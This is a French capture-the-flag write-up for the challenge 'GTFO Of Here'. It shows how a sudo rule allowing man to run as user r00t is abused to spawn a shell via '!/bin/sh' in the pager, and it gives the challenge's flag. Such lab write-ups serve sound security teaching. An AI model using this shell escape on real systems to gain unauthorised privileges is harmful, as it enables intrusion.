GTFO Of Here

Catégorie: Système Difficulté: - Flag: CTFREI{r4yt0_w4s_h3r3}

Challenge

Description

Le flag est situé ici : /home/r00t/flag/flag.txt

Nom d'utilisateur : jail Mot de passe : jail

ssh -p 4445 [email protected]

Ce challenge tourne sur un docker et n'est pas disponible

Solution

Une fois connecté en ssh, on vérifie nos droits avec la commande sudo -l :

jail@7255e9a6a24a:~$ sudo -l
Matching Defaults entries for jail on 7255e9a6a24a:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User jail may run the following commands on 7255e9a6a24a:
    (r00t) NOPASSWD: /usr/bin/man

On a le droit d'utiliser la commande man en tant que r00t, de là, on pourra accéder à un shell interactif. Une fois dans la page de manuel de ls par exemple, on peut lancer une commande shell en tapant ! suivi de /bin/sh :

jail@7255e9a6a24a:~$ sudo -u r00t man ls

   [...]

       --block-size=SIZE
              with -l, scale sizes by SIZE when printing them; e.g., '--block-size=M'; see SIZE format below

       -B, --ignore-backups
!/bin/sh
$ whoami
r00t

Notre shell est bien en tant que r00t, on peut maintenant récupérer le flag.

$ cat /home/r00t/flag/flag.txt
CTFREI{r4yt0_w4s_h3r3}

PrécédentBrokenBin SuivantPyjail

Dernière mise à jour il y a 8 mois

Cet article vous a-t-il été utile ?